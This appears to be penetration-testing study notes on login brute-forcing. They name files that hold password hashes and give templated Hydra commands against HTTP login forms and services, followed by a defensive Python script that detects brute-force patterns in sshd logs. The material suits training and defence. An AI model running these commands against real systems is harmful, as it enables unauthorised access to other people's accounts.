Login Bruteforcing

  • In Windows, the following files might contain password hashes:

    • unattend.xml

    • sysprep.inf

    • SAM

  • In Linux, the following files might contain password hashes:

    • shadow

    • shadow.bak

    • password

  • Since humans are generally lazy, it's a good idea to start by testing default credentials.

  • Hydra is a tool that can be used to do bruteforcing attacks.

  • CUPP is a tool that can be used to create customized wordlists.

  • Commands:

#Command to bruteforce a basic http authentication form
#Since we have the -C flag, the wordlist should be in the format Username:Password
hydra -C <Credentials-Word-List> <Target-IP-Address> -s <Target-Port> http-get

#Command for separate wordlists for usernames and passwords.
#The -u flag tries every username with the same password before moving to the next password, instead of the opposite (all passwords for one user).
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f <Target-IP-Address> -s <Target-Port> http-get <Target-Path>

#The uppercase -L and -P flags take wordlist files. To specify a single value instead, use the lowercase flags (-l, -p) followed by the value.

#To find the supported services by Hydra
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e

#To bruteforce a PHP/Other authentication form
hydra -C <Credentials-Word-List> <Target-IP-Address> -s <Target-Port> http-post-form "<Login-Page-URI>:<Username-Parameter-Name>=^USER^&<Password-Parameter-Name>=^PASS^:F=<Code-Only-Exist-In-Login-Page>"

#Example:
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

#Service Bruteforcing
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f <Service>://<Target-IP-Address>:<Target-Port>
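
How the -u ordering described above looks from the defending side, as an added example that is not part of the original notes: the Python below groups failed logins by source address and separates the "one password across many accounts" pattern from repeated guesses against a single account. The log lines are constructed, and the sshd-style message format, the thresholds and the function names are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style lines using documentation IP ranges; not real log data.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[811]: Failed password for root from 203.0.113.7 port 40001 ssh2
2024-05-01T10:00:02 sshd[811]: Failed password for root from 203.0.113.7 port 40002 ssh2
2024-05-01T10:00:03 sshd[811]: Failed password for root from 203.0.113.7 port 40003 ssh2
2024-05-01T10:00:04 sshd[811]: Failed password for root from 203.0.113.7 port 40004 ssh2
2024-05-01T10:00:05 sshd[811]: Failed password for root from 203.0.113.7 port 40005 ssh2
2024-05-01T10:01:01 sshd[811]: Failed password for alice from 198.51.100.9 port 50001 ssh2
2024-05-01T10:01:02 sshd[811]: Failed password for bob from 198.51.100.9 port 50002 ssh2
2024-05-01T10:01:03 sshd[811]: Failed password for invalid user carol from 198.51.100.9 port 50003 ssh2
2024-05-01T10:01:04 sshd[811]: Failed password for dave from 198.51.100.9 port 50004 ssh2
2024-05-01T10:01:05 sshd[811]: Failed password for invalid user erin from 198.51.100.9 port 50005 ssh2
2024-05-01T10:02:00 sshd[811]: Failed password for alice from 192.0.2.44 port 60001 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for "
                     r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse_failures(text):
    """Yield (timestamp, source_ip, username) for every failed-login line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["ip"], m["user"]

def classify_sources(text, window=timedelta(minutes=5), min_failures=5, min_users=4):
    """Map source IP -> (label, max failures against any one account)."""
    by_ip = defaultdict(list)
    for ts, ip, user in parse_failures(text):
        by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        verdicts[ip] = ("ok", 0)  # stays "ok" unless a window crosses the threshold
        for i, (start, _) in enumerate(events):
            per_user = Counter(u for t, u in events[i:] if t - start <= window)
            if sum(per_user.values()) >= min_failures:
                # Many accounts with few tries each matches the -u ordering;
                # a per-account lockout counter alone would not trip on it.
                label = "user-loop" if len(per_user) >= min_users else "single-account"
                verdicts[ip] = (label, max(per_user.values()))
                break
    return verdicts

if __name__ == "__main__":
    print(classify_sources(SAMPLE_LOG))
```

The second element of each verdict is the number a per-account lockout policy would count; for the user-loop source it stays at 1, which is why counting failures per source address is needed as well.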
